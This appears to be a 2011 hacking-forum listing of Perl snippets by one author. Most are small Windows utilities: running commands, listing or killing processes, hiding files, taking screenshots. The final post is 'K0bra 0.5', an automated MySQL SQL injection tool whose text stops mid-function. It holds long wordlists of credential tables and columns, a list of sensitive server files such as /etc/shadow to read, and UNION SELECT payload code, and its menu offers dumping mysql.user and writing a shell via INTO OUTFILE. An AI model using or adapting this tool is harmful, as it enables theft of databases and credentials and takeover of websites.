Topics - BigBear

#361
Scripting / [Perl] Function cmd()
13 October 2011, 17:12 PM
Hello everyone

I just wrote this cmd() function to be able to run commands
conveniently

Code (perl):

#By Doddy H

use strict;
use warnings;
use Win32::Job;

# Runs a command through cmd.exe (no console window) and returns its output lines.
# NOTE: $cmd is interpolated into the command line as-is, so cmd.exe interprets any
# shell metacharacters it contains; only pass input you control.
sub cmd {
    my ($cmd) = @_;
    my $log = "logx.txt";      # temporary capture file for stdout and stderr

    my $job = Win32::Job->new;
    # spawn($exe, $cmdline, \%options): $exe must be a real path, so use the
    # interpreter named by COMSPEC (cmd.exe) instead of the bare word "cmd"
    $job->spawn($ENV{COMSPEC}, qq{cmd /C $cmd}, {
        no_window => 1,
        stdout    => $log,
        stderr    => $log,
    });
    # run with a 30 second timeout; run() returns false if the job had to be killed
    my $ok = $job->run(30);
    warn "command timed out after 30 seconds\n" unless $ok;

    open(my $fh, '<', $log) or return;   # nothing captured (e.g. spawn failed)
    my @words = <$fh>;
    close $fh;

    unlink $log;

    return @words;
}



Usage example

Code (perl):
my @re = cmd("ver");
print @re;
#362
Scripting / [Perl] Function get_links()
12 October 2011, 16:47 PM
Hello, here I bring you a function to find the links in a web page

Code (perl):
use strict;
use warnings;
use HTML::LinkExtor;

our $code;   # global used by the original interface; read when no HTML is passed in

# Returns every link (href, src, ...) found in the HTML. Pass the HTML as the
# first argument; an optional second argument is the page URL, in which case
# relative links are returned as absolute URI objects.
sub get_links {
    my ($html, $base) = @_;
    $html = $code unless defined $html;
    my @links;
    my $parser = HTML::LinkExtor->new(sub {
        my ($tag, %attr) = @_;        # tag name and its link-bearing attributes
        push @links, values %attr;
    }, $base);
    $parser->parse($html);
    $parser->eof;
    return @links;
}

Usage example

Code (perl):
use LWP::Simple;

$code = get("http://127.0.0.1/doddy/index.php");

my @ver = get_links($code);

for my $url (@ver) {
    print $url."\n";
}
#363
Scripting / [Perl] Function getprocess()
12 October 2011, 16:46 PM
Hello, here I bring you a function that will show you the processes on your computer
Code (perl):

use strict;
use warnings;
use Win32::OLE qw(in);

# Lists the running processes through WMI (Win32_Process) and returns a hash of
# process name => PID. Several processes can share a name (e.g. svchost.exe);
# with this layout only one PID per name survives.
sub getprocess {
    my %procesos;

    my $uno = Win32::OLE->new("WbemScripting.SWbemLocator")
        or die "cannot create the WMI locator: " . Win32::OLE->LastError;
    my $dos = $uno->ConnectServer("", "root\\cimv2");   # local machine, CIMv2 namespace

    foreach my $pro (in $dos->InstancesOf("Win32_Process")) {
        $procesos{$pro->{Caption}} = $pro->{ProcessId};
    }
    return %procesos;
}


Usage example

Code (perl):

my %vida = getprocess();

for my $data (keys %vida) {
    print "[Proceso] : ".$data."\n";
    print "[PID] : ".$vida{$data}."\n\n";
}
#364
Scripting / [Perl] Function getmyip()
12 October 2011, 16:45 PM
Hello everyone.

Here I leave you a function I wrote to find out our IP without having to use web pages with that annoying online service


Code (perl):
#By Doddy H
use strict;
use warnings;
use Socket qw(inet_ntoa);
use Sys::Hostname;             # hostname()

# Resolves this machine's own hostname and returns its IPv4 address as a string.
# This is the address of a local interface, not the public address seen from
# the internet.
sub get_ip {
    my $get = gethostbyname(hostname())
        or return;             # resolution failed
    return inet_ntoa($get);
}



Usage example

Code (perl):

print get_ip();
#365
Scripting / [Perl] Function getdrive()
12 October 2011, 16:44 PM
With this function you can get the drive it is currently running on (c:/ or whichever)


Code (perl):
#By Doddy H
use strict;
use warnings;
use Cwd;

# Returns the drive of the current working directory, e.g. "C:/", or undef
# when the path has no drive letter (for example a UNC path).
sub getdrive {
    my $path = getcwd();    # on Windows Perl this looks like "C:/Users/..."

    if ($path =~ m{^([A-Za-z]):[/\\]}) {
        return $1 . ":/";
    }
    return;
}


Usage example

Code (perl):

print getdrive();

#366
Scripting / [Perl] Function hideit()
12 October 2011, 16:43 PM
With this function you can hide or show hidden files/directories on Windows

Code (perl):
#By Doddy H
use strict;
use warnings;
use Win32::File;    # exports the attribute constants (HIDDEN, READONLY, ...)

# hideit($path, "hide"|"show"): set or clear the HIDDEN attribute of a file or
# directory, leaving its other attributes (read-only, archive, ...) untouched.
# Returns 1 on success and 0 on an unknown mode or an API failure.
sub hideit {
    my ($file, $mode) = @_;
    my $attr;
    Win32::File::GetAttributes($file, $attr) or return 0;
    if ($mode eq "show") {
        $attr &= ~HIDDEN;
    }
    elsif ($mode eq "hide") {
        $attr |= HIDDEN;
    }
    else {
        print "error\n";
        return 0;
    }
    return Win32::File::SetAttributes($file, $attr) ? 1 : 0;
}


Usage example show/hide

Code (perl):

hideit("test.pl","show");

#367
Scripting / [Perl] Function screensave()
11 October 2011, 18:11 PM
Hello everyone.

With this function you can take a snapshot of the system

Code (perl):
#By Doddy H

use strict;
use warnings;
use Win32::Clipboard;
use Win32::GuiTest qw(SendKeys);

# Captures the active window: Alt+PrintScreen places it on the clipboard as a
# bitmap, and the clipboard bitmap (already in BMP file format) is written to
# foto.bmp in the current directory.
sub capture_window {
    SendKeys("%{PRTSCR}");    # % = Alt, {PRTSCR} = Print Screen key
    sleep 1;                  # give the shell a moment to place the bitmap on the clipboard

    my $bmp = Win32::Clipboard::GetBitmap();
    defined $bmp or die "no bitmap on the clipboard\n";

    open(my $foto, '>', "foto.bmp") or die "cannot write foto.bmp: $!";
    binmode($foto);
    print $foto $bmp;
    close $foto;
}


Usage example

capture_window();

And you will have the picture under the name foto.bmp
#368
Scripting / [Perl] Function savefile()
11 October 2011, 18:10 PM
Hello, with this function you can create a file and write to it. If the file already exists it just writes to it and does not erase it


Code (perl):
#By Doddy H
use strict;
use warnings;

# savefile($path, $text): append $text to $path, creating the file if needed.
# Existing content is kept because the file is opened in append mode (>>).
sub savefile {
    my ($file, $text) = @_;
    open(my $save, '>>', $file) or die "cannot open $file: $!";
    print $save $text;
    close $save;
}



Usage example

Code (perl):
savefile("C:\\Windows\\Logs\\file.txt","hola");

#369
Scripting / [Perl] Function printear()
11 October 2011, 18:10 PM
Hello everyone, today I bring you a function to be able to
use colours in Perl to display the text we want

Code (perl):
#By Doddy H

use strict;
use warnings;
use Color::Output;
Color::Output::Init();

# printear($text, $mode, $text_color, $input_color)
#   mode "text"  : print $text in colour $text_color
#   mode "stdin" : print $text as a prompt, read a line typed in colour
#                  $input_color and return it without the trailing newline
# Colours are selected with \x03 followed by the colour number; \x030 resets.
sub printear {
    my ($text, $mode, $color_text, $color_input) = @_;
    if ($mode eq "text") {
        cprint("\x03" . $color_text . $text . "\x030\n");
    }
    elsif ($mode eq "stdin") {
        if (defined $color_input && $color_input ne "") {
            cprint("\x03" . $color_text . $text . "\x030" . "\x03" . $color_input);
            my $op = <STDIN>;
            chomp $op;
            cprint("\x030");
            return $op;
        }
        print "error\n";    # stdin mode needs an input colour
    }
    else {
        print "error\n";
    }
    return;
}

Syntax

printear("text","text/stdin","color text","color output")


Usage examples

With plain text

Code (perl):
printear("hola","text","10","5");

Text with keyboard input

Code (perl):

my $d = printear("nombre : ","stdin","6","2");
print "pusiste $d\n";

#370
Scripting / [Perl] Function killprocess()
11 October 2011, 18:09 PM
Hello everyone, here I bring you a function to close the process you hate by giving its name and pid

Code (perl):
use strict;
use warnings;
use Win32::Process;

# killprocess($name, $pid): terminate the process with the given PID.
# Win32::Process::KillProcess($pid, $exitcode) only needs the PID; the name stays
# in the signature for the caller and is not checked. Returns 1 on success and
# 0 on failure (the barewords true/false used before are both true in Perl,
# because the string "false" is non-empty, so the old version never reported failure).
sub killprocess {
    my ($numb, $pid) = @_;

    if (Win32::Process::KillProcess($pid, 0)) {
        return 1;
    } else {
        return 0;
    }
}


Usage example

Code (perl):
if (killprocess("deamon.exe","4052")) {
    print "chau\n\a";
}
#371
Scripting / [Perl] Function movewin()
11 October 2011, 18:08 PM
Well, with this function you can drive a window crazy so that it moves around in evil ways

Code (perl):
#By Doddy H
use strict;
use warnings;
use Win32::API;

# movewin($hwnd): jiggles the window with handle $hwnd by calling
# user32!SetWindowPos(hWnd, hWndInsertAfter, X, Y, cx, cy, uFlags) 20 times.
sub movewin {
    my ($hwnd) = @_;
    # seven numeric parameters (the original listed six, with a stray "NN"); built once
    my $SetWindowPos = Win32::API->new("user32", "SetWindowPos", [qw(N N N N N N N)], 'N')
        or die "cannot import SetWindowPos: $^E";
    for my $n (1..20) {
        $SetWindowPos->Call($hwnd, 0, $n, $n, $n, $n, $n);   # hWndInsertAfter 0 = HWND_TOP
    }
}



Usage example

movewin($hwnd);   # $hwnd is the handle of the window to move
#372
Scripting / [Perl] K0bra 0.5
10 October 2011, 16:53 PM
Well, this is the new version of an sqli scanner I had made;
I fixed several bugs and added a few things

Code (perl):
#!usr/bin/perl
#k0bra 0.5
#Automatic SQL Scanner for MYSQL
#(c)0ded By Doddy H
#
#
#C:\Users\DoddyH>perl k0bra.pl http://127.0.0.1/sql.php?id= --
#
#
#
#
# @      @@   @
#@@     @  @ @@
# @ @@  @  @  @ @   @ @ @@@
# @ @   @  @  @@ @ @@@ @  @
# @@    @  @  @  @  @   @@@
# @ @   @  @  @  @  @  @  @
#@@@ @   @@   @@@  @@@ @@@@@
#
#
#
#
#[Status] : Scanning.....
#[Status] : Enjoy the menu
#
#[Target confirmed] : http://127.0.0.1/sql.php?id=-1+union+select+hackman,2,3
#[Bypass] : --
#
#
#
#--== information_schema.tables ==--
#
#[1] : Show tables
#[2] : Show columns
#[3] : Show DBS
#[4] : Show tables witg other DB
#[5] : Show columns with other DB
#
#
#--== mysql.user ==--
#
#[6] : Show users
#
#
#--== Others ==--
#
#[7] : Fuzzing tables
#[8] : Fuzzing columns
#[9] : Fuzzing files with load_file
#[10] : Dump
#[11] : Informacion of the server
#[12] : Create a shell with into outfile
#[13] : Show Log
#[14] : Exit
#
#
#[Option] : Enjoy this program xDDDDD
#

system('cls');
system ("title k0bra");



@buscar1 =('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','a
dmin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','us
er_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de s?rie','param?tre','?tat','stocker','texte','cvvnumber');

@buscar2 = ('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','membros','utilizadores','sysadmin','email','senha','username','name','user','user_name','user_username','uname','user_uname','usern','user_usern','un','user_un','mail','cliente','usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','nombre','host','pws','cedula','userName','host_password','chave','alias','apellido_nombre','cliente_nombre','cliente_email','cliente_pass','cliente_user','cliente_usuario','login_id','sistema_id','author','user_login','admin_user','admin_pass','uh_usuario','uh_password','psw','host_username','sistema_usuario','auth','key','usuarios_nombre','usuarios_nick','usuarios_password','user_clave','membername','nme','unme','password','user_password','autores','pass_hash','hash','pass','correo','usuario_nombre','usuario_nick','usuario_password','userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','user_passw','pwrd','user_pwrd','pwd','authors','user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor','upassword','web_password','web_username','tbladmins','sort','_wfspro_admin','4images_users','a_admin','account','accounts','adm','admin','admin_login','admin_userinfo','administer','administrable','administrate','administration','administrator','administrators','adminrights','admins','adminuser','art','article_admin','articles','artikel','ÃÜÂë','aut','autore','backend','backend_users','backenduser','bbs','book','chat_config','chat_messages','chat_users','client','clients','clubconfig','company','config','contact','contacts','content','control','cpg_config','cpg132_users','customer','customers','customers_basket','dbadmins','dealer','dealers','diary','download','Dragon_users','e107.e107_user','e107_user','forum.ibf_members','fusion_user_groups','fusion_users','group','groups','ibf_admin_sessions','ibf_conf_settings','ibf_members','ibf_members_converge','ibf_sessions','icq','images',
'index','info','ipb.ibf_members','ipb_sessions','joomla_users','jos_blastchatc_users','jos_comprofiler_members','jos_contact_details','jos_joomblog_users','jos_messages_cfg','jos_moschat_users','jos_users','knews_lostpass','korisnici','kpro_adminlogs','kpro_user','links','login_admin','login_admins','login_user','login_users','logins','logs','lost_pass','lost_passwords','lostpass','lostpasswords','m_admin','main','mambo_session','mambo_users','manage','manager','mb_users','member','memberlist','members','minibbtable_users','mitglieder','movie','movies','mybb_users','mysql','mysql.user','names','news','news_lostpass','newsletter','nuke_authors','nuke_bbconfig','nuke_config','nuke_popsettings','nuke_users','Óû§','obb_profiles','order','orders','parol','partner','partners','passes','passwords','perdorues','perdoruesit','phorum_session','phorum_user','phorum_users','phpads_clients','phpads_config','phpbb_users','phpBB2.forum_users','phpBB2.phpbb_users','phpmyadmin.pma_table_info','pma_table_info','poll_user','punbb_users','pwds','reg_user','reg_users','registered','reguser','regusers','session','sessions','settings','shop.cards','shop.orders','site_login','site_logins','sitelogin','sitelogins','sites','smallnuke_members','smf_members','SS_orders','statistics','superuser','sysadmins','system','sysuser','sysusers','table','tables','tb_admin','tb_administrator','tb_login','tb_member','tb_members','tb_user','tb_username','tb_usernames','tb_users','tbl','tbl_user','tbl_users','tbluser','tbl_clients','tbl_client','tblclients','tblclient','test','usebb_members','user_admin','user_info','user_list','user_logins','user_names','usercontrol','userinfo','userlist','userlogins','usernames','userrights','users','vb_user','vbulletin_session','vbulletin_user','voodoo_members','webadmin','webadmins','webmaster','webmasters','webuser','webusers','x_admin','xar_roles','xoops_bannerclient','xoops_users','yabb_settings','yabbse_settings','ACT_INFO','ActiveDataFeed','Category','CategoryGroup
','ChicksPass','ClickTrack','Country','CountryCodes1','CustomNav','DataFeedPerformance1','DataFeedPerformance2','DataFeedPerformance2_incoming','DataFeedShowtag1','DataFeedShowtag2','DataFeedShowtag2_incoming','dtproperties','Event','Event_backup','Event_Category','EventRedirect','Events_new','Genre','JamPass','MyTicketek','MyTicketekArchive','News','PerfPassword','PerfPasswordAllSelected','Promotion','ProxyDataFeedPerformance','ProxyDataFeedShowtag','ProxyPriceInfo','Region','SearchOptions','Series','Sheldonshows','StateList','States','SubCategory','Subjects','Survey','SurveyAnswer','SurveyAnswerOpen','SurveyQuestion','SurveyRespondent','sysconstraints','syssegments','tblRestrictedPasswords','tblRestrictedShows','TimeDiff','Titles','ToPacmail1','ToPacmail2','UserPreferences','uvw_Category','uvw_Pref','uvw_Preferences','Venue','venues','VenuesNew','X_3945','tblArtistCategory','tblArtists','tblConfigs','tblLayouts','tblLogBookAuthor','tblLogBookEntry','tblLogBookImages','tblLogBookImport','tblLogBookUser','tblMails','tblNewCategory','tblNews','tblOrders','tblStoneCategory','tblStones','tblUser','tblWishList','VIEW1','viewLogBookEntry','viewStoneArtist','vwListAllAvailable','CC_info','CC_username','cms_user','cms_users','cms_admin','cms_admins','jos_user','table_user','bulletin','cc_info','login_name','admuserinfo','userlistuser_list','SiteLogin','Site_Login','UserAdmin','Admins','Login','Logins');


@buscar3 =('c:/xampp/log.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt
/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/ph
p4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/pro
ftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog');

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common;
use URI::Split qw(uri_split);

my $nave = LWP::UserAgent->new();
$nave->timeout(5);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

&head;
unless(@ARGV == 2) {
&menu;
} else {
&scan($ARGV[0],$ARVG[1]);
}
&finish;

sub menu {
print "[Page] : ";
chomp(my $page=<STDIN>);
print "\n[Bypass : -- /* %00] : ";
chomp(my $bypass = <STDIN>);
print "\n\n";
&scan($page,$bypass);
}

sub scan {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
<STDIN>;
&head;
&menu;
}
}

sub head {
system 'cls';
print qq(


@      @@   @             
@@     @  @ @@             
@ @@  @  @  @ @   @ @ @@@
@ @   @  @  @@ @ @@@ @  @
@@    @  @  @  @  @   @@@
@ @   @  @  @  @  @  @  @
@@@ @   @@   @@@  @@@ @@@@@




);
}




sub copyright {
print "\n\n\n\n(C) Doddy Hackman 2010\n\n";
}


sub toma {
return $nave->request (GET $_[0])->content;
}


sub savefile {
open (SAVE,">>logs/webs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE;
}

sub finish {
print "\n\n\n(C) Doddy Hackman 2010\n\n";
<STDIN>;
exit(1);
}


sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page."1".$pass1."and".$pass1."1=0".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
$total.= ",".$rows;
$injection = $page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
